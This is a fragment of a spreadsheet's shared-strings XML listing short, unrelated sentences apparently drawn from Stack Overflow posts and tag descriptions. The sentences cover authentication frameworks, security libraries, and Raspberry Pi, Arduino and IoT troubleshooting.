    <t>HttpFS has built-in security supporting Hadoop pseudo authentication and HTTP SPNEGO Kerberos and other pluggable authentication mechanims.</t>
  </si>
  <si>
    <t>It also provides Hadoop proxy user support.</t>
  </si>
  <si>
    <t>It has built in integrations for Git and Github, Bitbucket, FTP, SSH, Dropbox, Google Drive, Amazon S3, OneDrive, and Digital Ocean.</t>
  </si>
  <si>
    <t>Data can be reused under a CC-BY attribution license.</t>
  </si>
  <si>
    <t>Security Architects who focus on all aspects of security.</t>
  </si>
  <si>
    <t>Repoze.what is an authorization framework that builds on the repoze.who authentication framework.</t>
  </si>
  <si>
    <t>The software is licensed under LGPL just like spotbugs.</t>
  </si>
  <si>
    <t>JSON schema is a vocabulary that allows you to annotate and validate JSON documents.</t>
  </si>
  <si>
    <t>It also takes care of silencing and inhibition of alerts.</t>
  </si>
  <si>
    <t>The protocol is decentralized and free.</t>
  </si>
  <si>
    <t>Capture Is now known as Registration.</t>
  </si>
  <si>
    <t>It also features an API for both the files and login services.</t>
  </si>
  <si>
    <t xml:space="preserve"> is the error code shown by Oracle when a login attempt to the database was not successful.</t>
  </si>
  <si>
    <t>Redisplay a form in the case of validation errors.</t>
  </si>
  <si>
    <t>Username is optional, only email is obligatory.</t>
  </si>
  <si>
    <t>User Profile (optional).</t>
  </si>
  <si>
    <t>GATE Developer, Embedded and Mmir are licenced under the Lesser GPL, and Teamware under the Affero GPL.</t>
  </si>
  <si>
    <t>See also: transparency, alpha, opacity</t>
  </si>
  <si>
    <t>On Windows, it is known as Intel Visual Fortran.</t>
  </si>
  <si>
    <t>Accountability, simplicity, and reliability.</t>
  </si>
  <si>
    <t>I will ban the spammers, rule breakers, flame-baiters and rep-whores.</t>
  </si>
  <si>
    <t>HOWEVER, It can really take up to 15 minutes (I've experienced this) for the device to post the didExitRegion: when in background in the worst case, when there is just significant location monitoring enabled combined with bad or no network.</t>
  </si>
  <si>
    <t>My goal is to have a Raspberry box which can be the Wi-Fi hotspot and accessable with ssh and vncviewer without any additional network.</t>
  </si>
  <si>
    <t>The user authentication should still be done on the server side.</t>
  </si>
  <si>
    <t>This will be on a TV overhead with the only access being SSh which is why it needs to be automated.</t>
  </si>
  <si>
    <t>I have excluded and included the lock through the raspberry pi and reset the controller stick.</t>
  </si>
  <si>
    <t>Their control is too much sophisticated.</t>
  </si>
  <si>
    <t>You need to get gnueabihf libraries of curl and crypto.</t>
  </si>
  <si>
    <t>Encrypt first with key and IV, and then encode to base64.</t>
  </si>
  <si>
    <t>Atom is a hackable text editor for the 21st Century.</t>
  </si>
  <si>
    <t>PicketLink is an umbrella project for security and identity management for Java Applications.</t>
  </si>
  <si>
    <t>A full implementation of TrustZone requires much more than exception states, which the Pi2 and Pi3 do not implement.</t>
  </si>
  <si>
    <t>It can also specify restrictions on device features such as in-app purchases or explicit content.</t>
  </si>
  <si>
    <t>A set of methods and triggers for the component and data verification.</t>
  </si>
  <si>
    <t>The Apigee Microgateway would be used to tract API utilization, enforce usage Quotas and token/key (i.e.</t>
  </si>
  <si>
    <t>A surrogate key can only be created in addition to any existing natural keys.</t>
  </si>
  <si>
    <t>SAML authorization is a two step process and you are expected to implement support for both.</t>
  </si>
  <si>
    <t>This tag should be used for all products provided by the Yubico company, such as Yubikey, a two-factor authentication hardware key.</t>
  </si>
  <si>
    <t>SmartMeter is a powerful java desktop application and peformance testing tool with JMeter compliant interface.</t>
  </si>
  <si>
    <t>Here's a way to execute a number of commands through SSH with  on the remote side (in case logging in as root is not an option):
-e to "fail on failure" (optional).</t>
  </si>
  <si>
    <t>Password storage is often a tricky issue - where do you keep it so that it is well protected?</t>
  </si>
  <si>
    <t>to secondary media, allowing for the recovery of the files, data, applications, etc.</t>
  </si>
  <si>
    <t>Data provided by the user by way of URLs, form data and cookies should always be treated as hostile and be sanitized.</t>
  </si>
  <si>
    <t>Newspeak is highly dynamic and reflective  - but designed to support modularity and security.</t>
  </si>
  <si>
    <t>Select skip and select the Device Registration section in Advanced Options in the sidebar.</t>
  </si>
  <si>
    <t>A Passport.js-based authentication generator for use with the Sails command-line interface.</t>
  </si>
  <si>
    <t>RegularExpressionValidator : A Validator used in ASP.NET to validate a particular control value as that of provided pattern.</t>
  </si>
  <si>
    <t>Class data sharing is not supported in Microsoft Windows 95/98/ME.</t>
  </si>
  <si>
    <t>It works on http/https and has a built in permission/authentication system with the ability to authenticate via LDAP or ActiveDirectory.</t>
  </si>
  <si>
    <t>---&gt; System.Security.Authentication.AuthenticationException: The remote certificate is invalid according to the validation procedure.</t>
  </si>
  <si>
    <t>This is a "security" feature on most modern browsers.</t>
  </si>
  <si>
    <t>And the first benefit is that it protects you against outside attacks.</t>
  </si>
  <si>
    <t>To mitigate this lack of security, ssh supports public key authentication.</t>
  </si>
  <si>
    <t>As of 2011 Microsoft has added OAuth 2.0 experimental support to their APIs.</t>
  </si>
  <si>
    <t>Counting login attempt for bruteforce preventing (optional).</t>
  </si>
  <si>
    <t>I couldn't find any useful codes on the internet that satisfies my requirement.</t>
  </si>
  <si>
    <t>Whatever I use needs to be very lightweight and not store cookies on the users device.</t>
  </si>
  <si>
    <t>If not possible, I can always do a full refresh after login.</t>
  </si>
  <si>
    <t>It should also have access to external USB devices for backups - or maybe a way to block external USB devices altogether, in case someone nefarious tries to copy my data over.</t>
  </si>
  <si>
    <t>I was wondering if it is possible to embed ssh into HTML code so when the user types in the Pi's IP address it then connects through to the pi via ssh.</t>
  </si>
  <si>
    <t>The dongle creates an eth1 interface with an automatic address that seems to be always 192.168.8.100.</t>
  </si>
  <si>
    <t>I need to be sure that the data stored in my database has not been modified.</t>
  </si>
  <si>
    <t>I'm working on an embedded home surveillance system.</t>
  </si>
  <si>
    <t>(The remote certificate is invalid according to the validation procedure.))</t>
  </si>
  <si>
    <t>(The remote certificate is invalid according to the validation procedure.)</t>
  </si>
  <si>
    <t>Pattern Identity translation seems to fit.</t>
  </si>
  <si>
    <t>(The remote certificate is invalid according to the
  validation procedure.)</t>
  </si>
  <si>
    <t>There is 'AppEUI' field on device registration form.</t>
  </si>
  <si>
    <t>This is the easiest method to do what you want, but also the least secure.</t>
  </si>
  <si>
    <t>Few NOSQL databases offer transaction support, although FoundationDB is one.</t>
  </si>
  <si>
    <t>If the ethernet shield that you're referring to has Wifi capabilities, then yes this is possible.</t>
  </si>
  <si>
    <t>Given the iOS security model, I am afraid that is the best you can do.</t>
  </si>
  <si>
    <t>In addition you should make sure that the php safe_mode is off.</t>
  </si>
  <si>
    <t>Another  option is to ssh -X user@192.168.0.6 and then execute xgps)
Telneting into gpsd, while interesting, is another tier diagnostic, as are others.</t>
  </si>
  <si>
    <t>But on Arduino you need to verify your bounds-check yourself (hey, it's embedded).</t>
  </si>
  <si>
    <t>the mount point should be in a directory owned by root and with search permissions only for owner).</t>
  </si>
  <si>
    <t>There isn't much you can do about this either as foreign servers trying to connect to your mail server will only do so on port 25.</t>
  </si>
  <si>
    <t>That you can concern about this project repository, but it's still on the deveploment stage by now.</t>
  </si>
  <si>
    <t>This should stop spam from mouse and it should be possible to upload code.</t>
  </si>
  <si>
    <t>As far as I know there is no way to specify a custom proxy for the  class.</t>
  </si>
  <si>
    <t>The Pi will act as access point and serve as a DHCP daemon, assigning and handling IP addresses to any devices that connect to it.</t>
  </si>
  <si>
    <t>However, check the 
 class, that provides ManagedGateway functionality.</t>
  </si>
  <si>
    <t>Follow the below steps:
Admin panel &gt; Applications &gt; GPIO control slave &gt; Credential service &gt; Trustful &gt; Saved.</t>
  </si>
  <si>
    <t>And Intel Edison is not a top-fast processor.</t>
  </si>
  <si>
    <t>A more interesting question would be why do you think you need to generate a new SAS token?</t>
  </si>
  <si>
    <t>The device identity limit is only present for the Free Edition.</t>
  </si>
  <si>
    <t>-fstack-protector-strong -Wformat -Werror=format-security   -I.</t>
  </si>
  <si>
    <t>It's effectively "root" access to your database - there is no auth and no uid.</t>
  </si>
  <si>
    <t>If your application uses Google
  Sign-In, some aspects of authorization are handled for you.</t>
  </si>
  <si>
    <t>Even to develop by using a SSH-enabled editor such as Emacs.</t>
  </si>
  <si>
    <t>The connectionState field is not reliable and should not be used to query device state.</t>
  </si>
  <si>
    <t>A PHP class that provides LDAP authentication with Active Directory.</t>
  </si>
  <si>
    <t>Most common cases are SQL injection and JavaScript injection.</t>
  </si>
  <si>
    <t>A CakePHP component for Access Control Lists.</t>
  </si>
  <si>
    <t>AquaticPrime is a library for OS X to manage application licenses and their verification.</t>
  </si>
  <si>
    <t>Generate Receipt Validation Code for OS X and iOS</t>
  </si>
  <si>
    <t>DTR is part of Docker Enterprise Edition:
-Docker Enterprise Engine
=========&gt; - Docker Trusted Registry &lt;=========
-Docker Universal Control Plane</t>
  </si>
  <si>
    <t>The software is commercially sold under a propriety license.</t>
  </si>
  <si>
    <t>On Unix-like systems, a special user account used for system administration.</t>
  </si>
  <si>
    <t>The user tried to install an Oracle database without having the appropriate privileges to the operating-system.</t>
  </si>
  <si>
    <t>JGroups is a java toolkit for reliable messaging.</t>
  </si>
  <si>
    <t>Scripts for CLI to generate code
Debug bar to ease debugging.</t>
  </si>
  <si>
    <t>To many people CVSNT is best known because it has been embedded in a 3rd party systems such as TortoiseCVS or WinCVS.</t>
  </si>
  <si>
    <t>The input is validated automatically.</t>
  </si>
  <si>
    <t>Support for Microsoft specific features such as document.all and the ActiveXObject has been cloaked.</t>
  </si>
  <si>
    <t>For example, session data is stored in the user cookie, and the cache is backed by a memcached cluster.</t>
  </si>
  <si>
    <t>UDP (User Datagram Protocol) is a lightweight, unreliable, datagram-oriented, connectionless protocol.</t>
  </si>
  <si>
    <t>Note that the use of the PID algorithm for control does not guarantee optimal control of the system or system stability.</t>
  </si>
  <si>
    <t>The verification is not a security feature in the first place!</t>
  </si>
  <si>
    <t>Hiredis only supports the binary-safe Redis protocol, so you can use it with any Redis version &gt;= 1.2.0.</t>
  </si>
  <si>
    <t>An attacker could even take full control over the computer through a gadget.</t>
  </si>
  <si>
    <t>Laravel provides several different approaches to validate your application's incoming data.</t>
  </si>
  <si>
    <t>In addition, the DMCA heightens the penalties for copyright infringement on the Internet.</t>
  </si>
  <si>
    <t>About Firebase Authentication
Firebase Authentication is a component of the Firebase suite of tools for cross-platform application development.</t>
  </si>
  <si>
    <t>Generate Receipt Validation Code for OS X and iOS
http://receigen.etiemble.com/</t>
  </si>
  <si>
    <t>The specification and associated RFCs are developed by the IETF OAuth WG; the main framework was published in October 2012.</t>
  </si>
  <si>
    <t>Java's typing discipline is static, strong, safe, nominative, and manifest.</t>
  </si>
  <si>
    <t>Magento offers no technical support, warranties or indemnification.</t>
  </si>
  <si>
    <t>It also has the added benefit of having code-level access.</t>
  </si>
  <si>
    <t>If you've never registered a Twitter
application before, it's easy!</t>
  </si>
  <si>
    <t>Adding an OpenID Connect server to your application allows you to support token authentication.</t>
  </si>
  <si>
    <t>The kiosk application locks down the computer and starts the SEB browser plus optional third party applications.</t>
  </si>
  <si>
    <t>Automatic exploit generation (for DECREE and simple Linux binaries) using rex.</t>
  </si>
  <si>
    <t>Concurrency
Tackle concurrency with built-in immutability and actor model.</t>
  </si>
  <si>
    <t>Develop Decentralized Applications (DApps) with Javascript and Sidechain architecture.</t>
  </si>
  <si>
    <t>If data must be synchronized between directory servers from different vendors, a synchronization device must be used.</t>
  </si>
  <si>
    <t>Duckyscript syntax
Scripting language for "USB Rubber Ducky" attack tool</t>
  </si>
  <si>
    <t>The following is a subset of useful features in HDFS:
File permissions and authentication.</t>
  </si>
  <si>
    <t>CAPTCHA for registration and repetitive login attempt (optional).</t>
  </si>
  <si>
    <t>See also this answer: Validation Error: Value is not valid.</t>
  </si>
  <si>
    <t>If you need to disclose details about your account, contact Google Enterprise Support.</t>
  </si>
  <si>
    <t>Cascading Stylesheets are only considered malicious when they invoke the JavaScript engine.</t>
  </si>
  <si>
    <t>Zuul is an edge service that provides dynamic routing, monitoring, resiliency, security, and more.</t>
  </si>
  <si>
    <t>Along with minification, it can also have the option to obfuscate any JavaScript code and/or Cascading Style Sheets.</t>
  </si>
  <si>
    <t>We recently updated the JavaScript SDK to support OAuth 2.0.</t>
  </si>
  <si>
    <t>I'm using ESP32-DevKitC that is on the breadboard, so no additional shielding is present.</t>
  </si>
  <si>
    <t>If you have a track to unlock me, thanks in advance</t>
  </si>
  <si>
    <t>Safari is a web browser developed by Apple Inc. and included with the OS X and iOS operating systems.</t>
  </si>
  <si>
    <t>Extended Permissions includes permissions such ads_management, manage_pages, publish_actions, publish_stream, publish_checkins and so on.</t>
  </si>
  <si>
    <t>OAuth 2.0 authorization server toolkit for Node.js.</t>
  </si>
  <si>
    <t>Cryptography API: Application programming interface that enables application developers to add authentication, encoding, and encryption to Windows-based applications.</t>
  </si>
  <si>
    <t>HMAC based password) be enough?</t>
  </si>
  <si>
    <t>Did you decode the SharedAccessKey with base64?</t>
  </si>
  <si>
    <t>Click on your role and view the trust relationships.</t>
  </si>
  <si>
    <t>For the authentication you need to generate a SAS token based on your device key.</t>
  </si>
  <si>
    <t>CookieHandler is in the center of cookie management.</t>
  </si>
  <si>
    <t>User's Data includes permissions such as user_location , user_relationships  , user_birthday , user_email and so on.</t>
  </si>
  <si>
    <t>My problem is that the fingerprint reader requires a custom data package for the handshake process.</t>
  </si>
  <si>
    <t>Other authentication options are available with some extra work but as a bare minimum basic auth and full https are better than nothing.</t>
  </si>
  <si>
    <t>You can modify the permisions using:
If the device is detachable, you may also consider creating an udev rule which will apply correct permissions each time you connect it.</t>
  </si>
  <si>
    <t>It used to remove an object permanently from the database along with all the data, privileges.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a high-performance public blockchain project and a distributed trust collaboration platform.</t>
  </si>
  <si>
    <t>The Advertising Identifier (IDFA) is a unique ID for each iOS device that mobile ad networks typically use to serve targeted ads.</t>
  </si>
  <si>
    <t>Our ad-hoc network is completely dynamic and decentralized (We cannot have any static nodes in the network).</t>
  </si>
  <si>
    <t>Since then, developers have had to register a device model before running the script.</t>
  </si>
  <si>
    <t>Questions about the usage of the PyCryptodome Python package in programming.</t>
  </si>
  <si>
    <t>Radius is a PHP package is based on the libradius (Remote Authentication Dial In User Service) of FreeBSD.</t>
  </si>
  <si>
    <t>Stupid me ran this code that created an administrative user and hid it from other accounts.</t>
  </si>
  <si>
    <t>Using Team Explorer with repos managed via the SSH protocol are still not supported.</t>
  </si>
  <si>
    <t>Malware can take many forms and perform multiple functions.</t>
  </si>
  <si>
    <t>For a networking class, I want to do a presentation and project on DDoS attacks.</t>
  </si>
  <si>
    <t>I also saw this on StackOverflow:
Python smtplib security
but the answer is not completely helping me resolve this conflict.</t>
  </si>
  <si>
    <t>Well I have a NFC reader RC522 and my goal is simulate a tag that has a password and once the user touch the reader, this password is transferred to the Arduino for further processing.</t>
  </si>
  <si>
    <t>Is there anyway for my server to search the network and identify the arduino so it could be added into the server database automatically.</t>
  </si>
  <si>
    <t>The connection to the IoT Hub can be secured very well (we will use certificates), and I want to awoid adding a different way of authentication to the architecture.</t>
  </si>
  <si>
    <t>Each of these locations will need to have a personalized dashboard to view their sensor network data.</t>
  </si>
  <si>
    <t>When running in safe mode, some features like  are disabled.</t>
  </si>
  <si>
    <t>you want to reduce the risk of injection attacks and the like.</t>
  </si>
  <si>
    <t>The October insider release has the onboard serial enabled.</t>
  </si>
  <si>
    <t>However, you'll see how easy it is to pass information from the Ubuntu server to the Pi without authentication.</t>
  </si>
  <si>
    <t>I also, personally, like to put something like a WebAPI service in front of the database if I'm exposing it to the internet.</t>
  </si>
  <si>
    <t>Add something like following logic into  method defenition of the arduino sketch:
Then you can check which device the programm is connected to sending IDENTIFICATION_REQUEST.</t>
  </si>
  <si>
    <t>You need check hardware compatibility list to see if your device is supported on Windows IoT core.</t>
  </si>
  <si>
    <t>You can check IoT Hub throttling and you and IoT Hub quotas and throttling for more detail.</t>
  </si>
  <si>
    <t>If you have access to a public server , what you can do is to init a reverse ssh connection from the raspberry pi to S, on a custom port, and then from any other computer, ssh on S and then ssh on the localhost, with the raspberry pi user, on your custom port.</t>
  </si>
  <si>
    <t>or
More details please see this document(How to specify device capabilities for HID).</t>
  </si>
  <si>
    <t>The callback will be invoked before the key event is given to the view.</t>
  </si>
  <si>
    <t>Security Assertion Markup Language 2.0 (SAML 2.0) is a version of the SAML standard for exchanging authentication and authorization data between security domains.</t>
  </si>
  <si>
    <t>Laravel ships with several pre-built authentication controllers for user registration,  authentication, and password reset.</t>
  </si>
  <si>
    <t>Scripting language for "USB Rubber Ducky" attack tool</t>
  </si>
  <si>
    <t>Security Assertion Markup Language 2.0 (SAML 2.0) is a standard providing means to exchange authentication and authorization data between security domains.</t>
  </si>
  <si>
    <t>The site then verifies the assertion using server-side code.</t>
  </si>
  <si>
    <t>Microsoft's Driver Signing Requirements page</t>
  </si>
  <si>
    <t>To secure against HTML injection, use the h() function to html_escape the output
For example::</t>
  </si>
  <si>
    <t>django-sslify is a pluggable django app that forces SSL on a Django site</t>
  </si>
  <si>
    <t>Maximize web security through a reduced server foot print and automatic application isolation.</t>
  </si>
  <si>
    <t>User data constraints are discussed in Specifying a Secure Connection.</t>
  </si>
  <si>
    <t>About
Security Assertion Markup Language 2.0 (SAML 2.0) is a version of the SAML standard for exchanging authentication and authorization data between security domains.</t>
  </si>
  <si>
    <t>Google supports OAuth 2.0 as the recommended authentication mechanism for all of its APIs.</t>
  </si>
  <si>
    <t>Or if you want to deduplicate your collection, do copyright detection, or resolve your users catalogs to yours.</t>
  </si>
  <si>
    <t>These models give you a type-safe API to work with GraphQL servers.</t>
  </si>
  <si>
    <t>Provided the database driver is licensed, data can be converted between different data sources.</t>
  </si>
  <si>
    <t>Jupyter Server Proxy is an open source server extension for Jupyter Notebook to proxy web services.</t>
  </si>
  <si>
    <t>The current LTS release is Symfony 3.4, being maintained until November of 2020 and will receive security updates until November 2021.</t>
  </si>
  <si>
    <t>Registration is instant or after activation by email (optional).</t>
  </si>
  <si>
    <t>AuthenticityToken is a feature of Ruby on Rails used to protect against CSRF</t>
  </si>
  <si>
    <t>Laravel ships with several pre-built authentication controllers for user registration, authentication, and password reset.</t>
  </si>
  <si>
    <t>Code economy - exploit features of C++ such as RTTI, templates, and multiple inheritance, etc.</t>
  </si>
  <si>
    <t>You should be able to log in from the extensions dialog.</t>
  </si>
  <si>
    <t>I think that adding export XAUTHORITY=/home/joe/.Xauthority to the script will work.</t>
  </si>
  <si>
    <t>Do I need some additional permissions for that?</t>
  </si>
  <si>
    <t>There are few more directory certs, crypto, security, include, virt and usr etc....</t>
  </si>
  <si>
    <t>Identity and mobility management.</t>
  </si>
  <si>
    <t>Whitelist-based Ruby HTML and CSS sanitizer.</t>
  </si>
  <si>
    <t>Token based authentication module for angular.js</t>
  </si>
  <si>
    <t>It's based on DX Auth, although the code was seriously reworked.</t>
  </si>
  <si>
    <t>JNCryptor is based on the RNCryptor library for iOS.</t>
  </si>
  <si>
    <t>SAML is a product of the OASIS Security Services Technical Committee.</t>
  </si>
  <si>
    <t>The Java Authentication and Authorization Service (JAAS) is a Java security framework for user-centric security to augment the java code-based security.</t>
  </si>
  <si>
    <t>Create, secure, and maintain the folder hierarchy to organize items on the server.</t>
  </si>
  <si>
    <t>If multicast DNS is not supported on host platform and you have access to your router, you can simply log into it and view the list of connected devices.</t>
  </si>
  <si>
    <t>If you are interested in jailbreaking your device, you can find a wealth of information on these sites, or by using a simple search.</t>
  </si>
  <si>
    <t>The simplest data validation verifies that the characters provided come from a valid set.</t>
  </si>
  <si>
    <t>I am currently looking for a way to synchronize confidential files between two PCs (and possibly an always running raspberry pi - would serve as a host and backup).</t>
  </si>
  <si>
    <t>To side step the need for privileges on ARM programs setup a jmpbuf and install a SIGILL handler.</t>
  </si>
  <si>
    <t>Libnids offers IP defragmentation, TCP stream assembly and TCP port scan detection.</t>
  </si>
  <si>
    <t>It attempts to reuse implementations from paste.auth for some of its functionality.</t>
  </si>
  <si>
    <t>This may seem like a quick and easy solution to querying data, however it can lead to data corruption, security breeches, and so-forth.</t>
  </si>
  <si>
    <t>I am trying to make a c program to access GPIOs on an embedded linux system which will be run by a non root user.</t>
  </si>
  <si>
    <t>I've been looking for a way to create an app that will allow me to use my Android device as a virtual keypad for a Security Alarm System (DSC 1832 Panel to be more specific).</t>
  </si>
  <si>
    <t>I'm in the process of trying to accomplish a proof of possession for an enrollment group.</t>
  </si>
  <si>
    <t>In addition to C. Ross's answer, keeping it open will prevent anything else from opening the SerialPort and blocking you later.</t>
  </si>
  <si>
    <t>It brings the industry-leading performance and security of SQL Server to Windows, Linux, and Docker containers.</t>
  </si>
  <si>
    <t>a technique used to increase the reliability of the Internet connection for an IP network.</t>
  </si>
  <si>
    <t>What Log4r adds to this philosophy is a flexible way of controling the information being logged.</t>
  </si>
  <si>
    <t>It has since been expanded to also validate both current competing JSON standards RFC 7159 and ECMA-404.</t>
  </si>
  <si>
    <t>NSKeyedArchiver, a concrete subclass of NSCoder, provides a way to encode objects (and scalar values) into an architecture-independent format that can be stored in a file.</t>
  </si>
  <si>
    <t>If the monitor is not connected when booting, I can NOT ssh through hostname.</t>
  </si>
  <si>
    <t>The structure of my database:
Replaced 
user_id
by the identifier attribute 
identifiant
of the request sent by Arduino</t>
  </si>
  <si>
    <t>I'm trying to implement the Feige Fiat Shamir Identification Scheme in C (Arduino) and it works, but only when .</t>
  </si>
  <si>
    <t>If yes, which is the best implement for debouncing on Linux?</t>
  </si>
  <si>
    <t>AuthHelper AH = new AuthHelper(GoogleSignIn.getAuthCode(this));
    GoogleCalendarHelper GCH = new GoogleCalendarHelper();
I realise that I may have to use AsyncTask, but how would that be implemented in this?</t>
  </si>
  <si>
    <t>When a device authenticates with IoT Hub, it includes its device id.</t>
  </si>
  <si>
    <t>If the hashed username and password exists, then you can allow login.</t>
  </si>
  <si>
    <t>PECL extension for OAuth 1.0</t>
  </si>
  <si>
    <t>OpenID Connect Provider and OAuth 2.0 Authorization Server Framework based on Katana.</t>
  </si>
  <si>
    <t>Runtime Permission Helper for Android M.</t>
  </si>
  <si>
    <t>It is used to implement security.</t>
  </si>
  <si>
    <t>Response verification is regex-based.</t>
  </si>
  <si>
    <t>-Wikipedia
Also, there is now a successor available at codeplex, which is based on the TrueCrypt sourcecode: VeraCrypt.</t>
  </si>
  <si>
    <t>Its based on DX Auth, althouth the code was seriously reworked.</t>
  </si>
  <si>
    <t>The WiFi shield was based on a transceiver made by ZeroG.</t>
  </si>
  <si>
    <t>Ok thanks JSC you'v been so helpfull 
I took your advice and in the end my code should do this:
1) user enters password "###"
2) LCD shows 4 product "price List" (prices should be from EEPROM)
3) user press key "1"
4) on LCD: "please enter new price1" and the user sets some new number for "newPrice1"
5) user press key "A" and "newPrice1" is saved to EEPROM  after a small delay
on LCD there is a "PriceList" again with 4 prices but with "newPrice1"
6) user press key "2" 
7) on LCD: "please enter new price2" and the user sets some new number for new  "newPrice2"
5) user press key "A" again and "newPrice2" is saved to EEPROM after a small delay on LCD there is a "PriceList" again with 4 prices but with "newPrice2"
and so on for price3 and price4 
that is the idea :)
But my code its not working correctly and I don't know Why?</t>
  </si>
  <si>
    <t>Secure Transaction</t>
  </si>
  <si>
    <t>Common events that can trigger an IPN notice
ebay payments
Credit Card payments
Credit Card disputes
PayPal disputes (where PayPal was the payment method)
Dispute settlement
echeck payment clearance (a PayPal payment status change)
Related Tags
paypal
Useful links:
PayPal's IPN Development Guide
Your IPN History (login required)
NodeJS IPN verification script</t>
  </si>
  <si>
    <t>When the card is scanned, the data from the database will be retrieved and show to the interface screen, I have 2 RFID which is located in separated doors, ENTRANCE and EXIT and 1 server database to save the logged in students and out..Now the problem is when the student doesn't scan his/her RFID card in the entrance, the error will show in the EXIT interface when the student scans his Id in the EXIT.</t>
  </si>
  <si>
    <t>It looks like a number of the system tables get corrupted - I can fix this with mysqlcheck and a lot of mucking about but that's frustrating, so I just keep a couple of working SD cards and swap them in + re-image the corrupted one (usually this only costs me a few minutes of data on the old card).</t>
  </si>
  <si>
    <t>My steps are as follows: 
in terminal type: ssh -v pi@
when prompted to enter password, enter "raspberry" (my terminal asks me three times to enter a password and then the fourth time to enter password for pi@).</t>
  </si>
  <si>
    <t>The issue I'm having now is combining the codes in such a way that the lcd display shows enter password and once the correct password is entered, it displays "accepted" and a led turns on to indicate password correct.</t>
  </si>
  <si>
    <t>All API changes
Here is a summary of the major API-changes:
Runtime Permissions
Power-Saving Optimizations
Adoptable Storage Devices
Apache HTTP Client Removal
AudioManager Changes
Notifications
Text Selection
Android Keystore Changes
Wi-Fi and Networking Changes
Camera Service Changes
Runtime
Access to Hardware Identifier
APK Validation
USB Connection
Android for Work Changes
Official:
Official documentation 
Official changes documentation</t>
  </si>
  <si>
    <t>Host Card Emulation (also known as soft-SE or software card emulation) is the emulation of a virtual smart card (that is not backed by an actual smart card chip) using only software.</t>
  </si>
  <si>
    <t>The main thing I want to be able to do is:
create a safe where it will open when I enter the correct passcode into an iPad or some touch screen
be able to set the passcode
When working on such a project, do I need the hardware first?</t>
  </si>
  <si>
    <t>So I solved my problem by using the wifi command on the Terminal:
Which automatically asks me for an input: passkey&gt; .Where you can actually type the password, press enter and after that it automatically connects to the wifi.</t>
  </si>
  <si>
    <t>Netbanx allows merchants and retailers to accept and process web or call centre captured global payments via credit cards, debit cards, pre-paid cards, and a range of other payment types.</t>
  </si>
  <si>
    <t>Client side:
Server Side code that Saves corrupt images:
The above server code saves mostly corrupted image and garbage images and very occasionally the correct images.</t>
  </si>
  <si>
    <t>Automatic number-plate recognition is a technology that uses optical character recognition on images to read vehicle registration plates to create vehicle location data</t>
  </si>
  <si>
    <t>I had a couple of problems from the start
My whole html root folder requires a password
I didn't understand what a GET request was doing in this instance
My script files weren't working properly
Here's how I was able to correct these issues and get it working
Send the username/password in the GET request, not extremely secure, but oh well:
With the basic GET request it appears to just basically "load" the URL given as if you typed it in a browser address bar and hit enter, this means that if my script file is working correctly it should run the script
I corrected my script files</t>
  </si>
  <si>
    <t>I would like to create a face recognition system, basically i would like to set a raspberry with camera over the doors, like that, when students pass the door will be automatically marked as present.</t>
  </si>
  <si>
    <t>In other words, 
Pi creates ad hoc network "MyPi"
User switches mobile phone wifi network to "MyPi"
With phone connected to Pi, Pi scans for networks and user picks network, enters password via mobile app
Pi tries to connect to the home network with the password</t>
  </si>
  <si>
    <t>I'm stuck thinking about all the security issues, I can't even figure out what problems I'll be facing due to I'm relatively new working on this.</t>
  </si>
  <si>
    <t>Resetting the system via hard reset fixes the issue (soft reset does not work as the system seems to be locked up).</t>
  </si>
  <si>
    <t>All API changes
Here is a summary of the major API-changes:
Runtime Permissions
Power-Saving Optimizations
Adoptable Storage Devices
Apache HTTP Client Removal
AudioManager Changes
Notifications
Text Selection
Android Keystore Changes
Wi-Fi and Networking Changes
Camera Service Changes
Runtime
Access to Hardware Identifier
APK Validation
USB Connection
Android for Work Changes
Official website:
Yet to come.</t>
  </si>
  <si>
    <t>But since my plan all along was to use pyspotify I managed to log in using their jukebox example and hardcoding my username where appropriate and adding the nice little u infront of it, and now I can login to spotify, see line ~460 in the jukebox example:
Which i changed to this:
session_m = Jukebox(u"username_with_", options.password, True)
Now my problem is another which is that I can't access /dev/dsp but that is an entirerly different problem.</t>
  </si>
  <si>
    <t>pi@raspberrypi:~ $ mysql -u root -p
Enter password:
ERROR 1698 (28000): Access denied for user 'root'@'localhost'
pi@raspberrypi:~ $
I am sure I used the correct password (and have actually gone through this process a couple times)
I can login to mysql with just sudo any no password, but this does not solve the problem of needing non sudo access
pi@raspberrypi:~ $ sudo mysql
Welcome to the MariaDB monitor.</t>
  </si>
  <si>
    <t>I've been able to rescue the (micro)SD cards by putting them into my old Symbian phone which immediately recognizes that the card is locked and offers to reformat the card and reset the password.</t>
  </si>
  <si>
    <t>The problem that I'm facing is that when I compare the typed word and and the correct password I'm getting always "wrong password".</t>
  </si>
  <si>
    <t>Features:
Scan barcodes using Goggles to get product information
Scan QR codes using Goggles to extract information
Recognize famous landmarks
Translate by taking a picture of foreign language text
Add Contacts by scanning business cards or QR codes
Scan text using Optical Character Recognition (OCR)
Recognize paintings, books, DVDs, CDs, and just about any 2D image
Solve Sudoku puzzles
Find similar products</t>
  </si>
  <si>
    <t>Automatic Number Plate Recognition is a surveillance method that uses optical character recognition on images to read the license plates on vehicles.</t>
  </si>
  <si>
    <t>Automatic number plate recognition is a mass surveillance method that uses optical character recognition on images to read the license plates on vehicles.</t>
  </si>
  <si>
    <t>Enter current password for root (enter for none):
ERROR 1698 (28000): Access denied for user 'root'@'localhost'
Enter current password for root (enter for none):
Now I had pressed enter, no password which should be the case since it is a brand new install
Now, If I run the same install script with sudo
pi@raspberrypi:~ $ sudo mysql_secure_installation
NOTE: RUNNING ALL PARTS OF THIS SCRIPT IS RECOMMENDED FOR ALL MariaDB
      SERVERS IN PRODUCTION USE!</t>
  </si>
  <si>
    <t>Basically, I build the image with Docker Desktop on a win10 64bit machine using this Dockerfile:
Then in the Raspberry, if I pull the image and run it with:
docker run --privileged --device=/dev/vchiq -p 3000:3000 [my/image:latest]
I get:
Error: spawn /opt/vc/bin/raspistill ENOENT
After some researching, I also tried running with:
docker run --privileged -v=/opt/vc/bin:/opt/vc/bin --device=/dev/vchiq -p 3000:3000 [my/image:latest]
And with that command, I get:
stderr: /opt/vc/bin/raspistill: error while loading shared libraries: libmmal_core.so: cannot open shared object file: No such file or directory
Can someone share some thoughts on what changes do I have to make to the Dockerfile so that I'm able to access the pi camera from inside the Docker container?</t>
  </si>
  <si>
    <t>Using Touch ID, users can authorize payments using credit and debit card payment credentials that are stored on iPhone 6 and iPhone 6 Plus.</t>
  </si>
  <si>
